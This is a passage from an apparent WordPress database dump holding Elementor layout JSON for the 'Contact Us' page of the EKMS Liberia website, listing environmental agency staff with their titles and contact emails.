layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:Kamara.ed14@gmail.com\\\">Kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14766,2342,'_elementor_edit_mode','builder'),(14767,2342,'_elementor_template_type','wp-page'),(14768,2342,'_elementor_version','2.7.5'),(14769,2342,'_wp_page_template','default'),(14770,2342,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a 